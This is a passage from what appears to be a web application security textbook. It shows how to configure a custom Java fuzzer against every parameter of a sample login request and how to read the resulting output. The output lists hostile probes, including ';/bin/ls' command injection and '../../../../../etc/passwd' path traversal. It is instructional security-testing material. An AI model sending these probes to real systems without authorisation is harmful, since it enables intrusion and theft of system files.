Incorporating this search functionality into JAttack will frequently prove

This is all we need to do to create a basic web application fuzzer. To deliver

the actual attack, we simply need to configure JAttack with the relevant

request details, instructing it to attack every parameter, as follows:

String method = “POST”;

String url = “/app/acc/login.jsp”;

Param[] params = new Param[] 

{

new Param(“ts”, “29813”, Param.Type.URL, true),

new Param(“_DARGS”, 

“/app/acc/login_assumed.jsp”, Param.Type.URL, true),

new Param(“webabacus_id”, “131st22418177-1”, Param.Type.COOKIE, true),

new Param(“DYN_USER_ID”, “100014981”, Param.Type.COOKIE, true),

new Param(“USER_CONFIRM”, “836de5f76c5ec83”, Param.Type.COOKIE, true),

new Param(“ParkoSearch2007”, “true”, Param.Type.COOKIE, true),

new Param(“JSESSIONID”, “DKBHCAOQQWHFFCKTR”, Param.Type.COOKIE, true),

new Param(“_dyncharset”, “UTF-8”, Param.Type.BODY, true),

new Param(“_template”, “app/inc/templ.jsp”, Param.Type.BODY, true),

new Param(“personalDetailsURL”, 

“..%2Facc%2Fregister_p1.jsp”, Param.Type.BODY, true),

new Param(“login”, “user@wahh-mail.com”, Param.Type.BODY, true),

new Param(“originalRedirectFromURL”, “+”, Param.Type.BODY, true),

new Param(“password”, “bestinfw”, Param.Type.URL,BODY),    

};

PayloadSource payloads = new PSFuzzStrings();

With this configuration in place, we can launch our attack. Within a few sec-

onds, JAttack has submitted each of the attack payloads within each parame-

ter of the request — over 50 requests in all, which would have taken several

minutes at least to issue manually, and far longer to review and analyze the

raw responses received.

The next task is to manually inspect the output from JAttack and attempt to

identify any anomalous results that may indicate the presence of a vulnerabil-

ity. Let’s take a look at an extract of the output:

_template           ‘                          500   498     error    not found

_template           ;/bin/ls                   500   498     error    not found

_template           ../../../../../etc/passwd  200   3987

_template           xsstest                    500   498     error    not found

personalDetailsURL  ‘                          200   39192

personalDetailsURL  ;/bin/ls                   200   39199

personalDetailsURL  ../../../../../etc/passwd  200   39417

personalDetailsURL  xsstest                    200   39198   xsstest

login               ‘                          500   761     error    illegal

login               ;/bin/ls                   302   412     invalid

login               ../../../../../etc/passwd  302   412     invalid

login               xsstest                    302   412     invalid

Download 5,76 Mb.

Do'stlaringiz bilan baham: